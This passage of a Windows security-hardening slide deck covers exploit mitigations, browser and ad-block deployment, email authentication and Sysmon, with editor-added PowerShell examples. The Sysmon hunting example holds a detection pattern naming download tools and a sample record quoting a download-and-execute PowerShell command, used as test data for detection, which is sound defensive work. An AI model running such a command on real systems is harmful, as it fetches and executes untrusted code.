    • Bundled with recommended protections for a variety of Microsoft and 3rd-party apps.
    • Disable protections on Chrome due to conflicts.
    • http://www.zdnet.com/article/emet-your-enterprise-for-peak-windows-security/
  • 27. 5b. Inbuilt protections in Windows 10
    • Windows 10, version 1607 and later; Windows Server 2016.
    • On for all 64-bit processes: DEP, SEHOP and ASLR.
    • Configurable protections: DEP, DEP ATL thunk emulation, SEHOP, Mandatory ASLR, Bottom-Up ASLR.
    • Configurable by, well, Group Policy.
    • https://technet.microsoft.com/en-us/itpro/windows/keep-secure/override-mitigation-options-for-app-related-security-policies
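On Windows 10 1607 and Server 2016 the Group Policy route the slide links to is the only one; from Windows 10 1709 onwards the same mitigations are exposed through the ProcessMitigations PowerShell module (Exploit Protection). The block below is an added example (the editor's, not from the deck) that sets the five configurable protections from the slide system-wide and for the programs that open attachments, then verifies and exports the result; the executable names are assumptions for a typical Office and Acrobat Reader install, and the commands must run elevated.

```powershell
# Added example (editor's, not from the deck). Requires Windows 10 1709+ / Server 2019
# for the ProcessMitigations module; older builds use the Group Policy setting instead.
$mitigations = 'DEP', 'EmulateAtlThunks', 'SEHOP', 'ForceRelocateImages', 'BottomUp'

# System-wide defaults: the slide's DEP, DEP ATL thunk emulation, SEHOP,
# Mandatory ASLR (ForceRelocateImages) and Bottom-Up ASLR. Mandatory ASLR should
# always be paired with BottomUp, otherwise relocated images land at predictable addresses.
Set-ProcessMitigation -System -Enable $mitigations

# Per-executable overrides for the programs that open mail attachments and links
# (names are assumptions for a default Office / Acrobat Reader install).
foreach ($exe in 'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe', 'AcroRd32.exe') {
    Set-ProcessMitigation -Name $exe -Enable $mitigations
}

# Verify what is in effect.
Get-ProcessMitigation -System
Get-ProcessMitigation -Name winword.exe

# Export the full configuration as XML; the file can be imported on another host with
# Set-ProcessMitigation -PolicyFilePath, or deployed through the Exploit Protection GPO.
Get-ProcessMitigation -RegistryConfigFilePath "$env:TEMP\exploit-protection.xml"
```

Test the per-application settings on a pilot group first: mandatory ASLR and the ATL thunk emulation are the two most likely to break older plug-ins, which is the same reason the EMET slide recommends exempting Chrome.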
  • 28. 6. Deploy Chrome and Firefox
    • Reduces issues caused by users attempting to install 3rd-party browsers.
    • Chrome is the leader of the pack, followed by Edge, for security.
    • Chrome has ADM/ADMX files for Group Policy; Firefox has 3rd-party Group Policy support.
    • Chrome: http://goo.gl/2QvOT
    • Firefox: https://developer.mozilla.org/en-US/Firefox/Enterprise_deployment
  • 30. 7. Block ads
    • Internet Explorer: https://decentsecurity.com/adblocking-for-internet-explorer-deployment/
    • Edge: https://www.microsoft.com/en-us/store/p/adblock/9nblggh4rfhk
    • Chrome: https://decentsecurity.com/ublock-for-google-chrome-deployment/
    • Firefox: https://decentsecurity.com/ublock-for-firefox-deployment/
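For Chrome, the deployment the slide links to comes down to one policy, ExtensionInstallForcelist, which force-installs an extension and stops users removing it. The block below is an added example (the editor's, not from the deck or decentsecurity.com) showing the registry form of that policy, which is what the Chrome ADMX templates from the previous slide write; it assumes an elevated shell on the target machine, and the uBlock Origin Web Store ID is as published in the Chrome Web Store.

```powershell
# Added example (editor's, not from the deck): force-install uBlock Origin via the
# Chrome ExtensionInstallForcelist policy, written directly to the policy key.
$forceList = 'HKLM:\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist'
# Format is "<extension id>;<update url>"; this is uBlock Origin's Web Store ID.
$uBlockOrigin = 'cjpalhdlnbpafiamejdnhcphjbkeiagm;https://clients2.google.com/service/update2/crx'

if (-not (Test-Path $forceList)) { New-Item -Path $forceList -Force | Out-Null }

# The list is a set of numbered string values ("1", "2", ...). Append after the
# highest existing number, and only if the entry is not already present.
$props  = (Get-ItemProperty -Path $forceList).PSObject.Properties | Where-Object { $_.Name -match '^\d+$' }
$values = $props | ForEach-Object Value
if ($values -notcontains $uBlockOrigin) {
    $max  = ($props | ForEach-Object { [int]$_.Name } | Measure-Object -Maximum).Maximum
    $next = ([int]$max + 1).ToString()
    New-ItemProperty -Path $forceList -Name $next -PropertyType String -Value $uBlockOrigin | Out-Null
}

# Verify; on the client, chrome://policy shows the same list once Chrome re-reads policy.
Get-ItemProperty -Path $forceList | Select-Object -Property * -ExcludeProperty PS*
```

Writing to HKLM\SOFTWARE\Policies directly is fine for a lab or a one-off; in production push the same value through the Group Policy template so it survives and is reported like any other policy.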
  • 31. 8. Filter common email attacks
    • Identify common phrases and syntax in phishing and ransomware emails.
    • Quarantine them before they get to your users.
    • https://github.com/SwiftOnSecurity/PhishingRegex
  • 32. 9. Enable SPF, DKIM and DMARC
    • SPF: the domain owner specifies which servers are allowed to send email for the domain.
    • DKIM: a domain asserts responsibility for the emails it sends by signing them.
    • DMARC: builds on SPF and DKIM; lets the domain owner publish a policy for mail that fails the aligned checks and collect reports on it.
    • https://dmarc.org/presentations/Email-Authentication-Basics-2015Q2.pdf
  • 33. 9. Enable SPF, DKIM and DMARC (continued): Alexa Top 500 DMARC usage (pie chart: DMARC vs. no DMARC; source: Detectify).
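Before enabling these, and after, check what is actually published. The function below is an added example (the editor's, not from the deck) that pulls a domain's SPF, DKIM and DMARC TXT records and summarises what a receiving server will enforce. It uses Resolve-DnsName from the Windows DnsClient module; the DKIM selector names are assumptions, since selectors are chosen by the sender (Exchange Online uses selector1/selector2, Google Workspace uses google).

```powershell
# Added example (editor's, not from the deck): read and summarise a domain's
# email authentication records.
function Get-EmailAuthRecords {
    param(
        [Parameter(Mandatory)][string]$Domain,
        # Selector names are an assumption; add your own provider's selector here.
        [string[]]$DkimSelectors = @('selector1', 'selector2', 'google', 'default')
    )

    function Get-TxtRecord([string]$Name) {
        # TXT data longer than 255 bytes is split into several strings; join them back.
        try {
            Resolve-DnsName -Name $Name -Type TXT -ErrorAction Stop |
                Where-Object { $_.Type -eq 'TXT' } |
                ForEach-Object { -join $_.Strings }
        } catch { @() }
    }

    $spf   = Get-TxtRecord $Domain          | Where-Object { $_ -like 'v=spf1*' }   | Select-Object -First 1
    $dmarc = Get-TxtRecord "_dmarc.$Domain" | Where-Object { $_ -like 'v=DMARC1*' } | Select-Object -First 1
    $dkim  = foreach ($s in $DkimSelectors) {
        if (Get-TxtRecord "$s._domainkey.$Domain" | Where-Object { $_ -match 'v=DKIM1|p=' }) { $s }
    }

    # DMARC is "tag=value; tag=value". p= is the policy (none/quarantine/reject),
    # rua= is where aggregate reports go. p=none only monitors; nothing is rejected.
    $tags = @{}
    if ($dmarc) {
        foreach ($pair in $dmarc -split ';') {
            $kv = $pair.Trim() -split '=', 2
            if ($kv.Count -eq 2) { $tags[$kv[0].Trim()] = $kv[1].Trim() }
        }
    }

    # The final "all" mechanism decides what happens to unlisted senders:
    # -all = fail, ~all = softfail (often delivered anyway), ?all/+all = effectively no policy.
    $spfAll = $null
    if ($spf) { $spfAll = $spf -split '\s+' | Where-Object { $_ -match 'all$' } | Select-Object -Last 1 }

    [pscustomobject]@{
        Domain          = $Domain
        SPF             = $spf
        SpfAllQualifier = $spfAll
        DkimSelectors   = $dkim
        DMARC           = $dmarc
        DmarcPolicy     = $tags['p']
        DmarcReports    = $tags['rua']
    }
}

Get-EmailAuthRecords -Domain 'example.com' | Format-List
```

Read the output as a whole: SPF with ~all and no DMARC record means spoofed mail from your domain is still delivered by most receivers, and DMARC with p=none is only the monitoring phase, useful for collecting the rua reports before moving to quarantine and then reject.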
  • 34. 10. Implement Sysmon
    • Sysmon from Microsoft (https://technet.microsoft.com/en-us/sysinternals/sysmon)
    • + configuration from SwiftOnSecurity (https://github.com/SwiftOnSecurity/sysmon-config/)
    • + free SIEM from Graylog (https://www.graylog.org/)
    • + Sysmon for Graylog (https://github.com/ion-storm/Graylog_Sysmon)
    • = Awesome dashboard
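A dashboard is only as good as the questions asked of it. The block below is an added example (the editor's, not from the deck or the linked repositories) that installs Sysmon with the SwiftOnSecurity configuration and then hunts the process-creation log (Event ID 1) for the chain shown in the example attack slide: an Office application spawning a shell, or a shell running a WebClient download into the temp directory. The installer line assumes Sysmon64.exe and the config XML sit in the current directory; the sample records at the end are constructed so the filter can be exercised offline, and are not real telemetry.

```powershell
# Added example (editor's, not from the deck): install Sysmon, then hunt Event ID 1
# for the Office -> shell -> download chain from the example attack.
# Install (elevated), once:
#   .\Sysmon64.exe -accepteula -i .\sysmonconfig-export.xml

function Test-OfficeDownloadChain {
    # Returns $true for a process-create record that looks like the sample attack.
    param([Parameter(Mandatory)]$Event)   # object with Image, ParentImage, CommandLine
    $officeParents = 'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe'
    $parent = [IO.Path]::GetFileName("$($Event.ParentImage)").ToLower()
    $image  = [IO.Path]::GetFileName("$($Event.Image)").ToLower()
    $cmd    = "$($Event.CommandLine)"

    $fromOffice  = $officeParents -contains $parent
    $isShell     = $image -in 'cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe'
    $downloads   = $cmd -match 'DownloadFile|DownloadString|WebClient|Invoke-WebRequest|bitsadmin|certutil'
    $runsFromTmp = $cmd -match '%TMP%|%TEMP%|\\AppData\\Local\\Temp\\'

    return ($fromOffice -and $isShell) -or ($isShell -and $downloads -and $runsFromTmp)
}

function Get-SysmonProcessCreate {
    # Pull Event ID 1 records from the live Sysmon log into the shape the test expects.
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -MaxEvents $MaxEvents |
        ForEach-Object {
            $data = @{}
            ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $data[$_.Name] = $_.'#text' }
            [pscustomobject]@{
                Time        = $_.TimeCreated
                User        = $data['User']
                Image       = $data['Image']
                ParentImage = $data['ParentImage']
                CommandLine = $data['CommandLine']
            }
        }
}

# Constructed sample records (not real telemetry): two modelled on the example attack, one benign.
$samples = @(
    [pscustomobject]@{
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentImage = 'C:\Windows\System32\cmd.exe'
        CommandLine = "PowerShell (New-Object System.Net.WebClient).DownloadFile('http://<omitted>/2011/stinfo.pdf','%TMP%yvatu.exe');Start-Process '%TMP%yvatu.exe'"
    },
    [pscustomobject]@{
        Image       = 'C:\Windows\System32\cmd.exe'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        CommandLine = 'cmd /c PowerShell ...'
    },
    [pscustomobject]@{
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentImage = 'C:\Windows\explorer.exe'
        CommandLine = 'powershell.exe -File C:\Scripts\Backup.ps1'
    }
)
$samples | Where-Object { Test-OfficeDownloadChain $_ } | Format-Table Image, ParentImage -AutoSize

# Against the real log:
# Get-SysmonProcessCreate | Where-Object { Test-OfficeDownloadChain $_ } | Format-Table Time, User, ParentImage, CommandLine -Wrap
```

The first two samples match (shell with a WebClient download into %TMP%, and Word spawning cmd.exe); the backup script does not. The same conditions translate directly into a Graylog stream rule on the Sysmon fields once the events are shipped, which is where the slide's dashboard earns its keep.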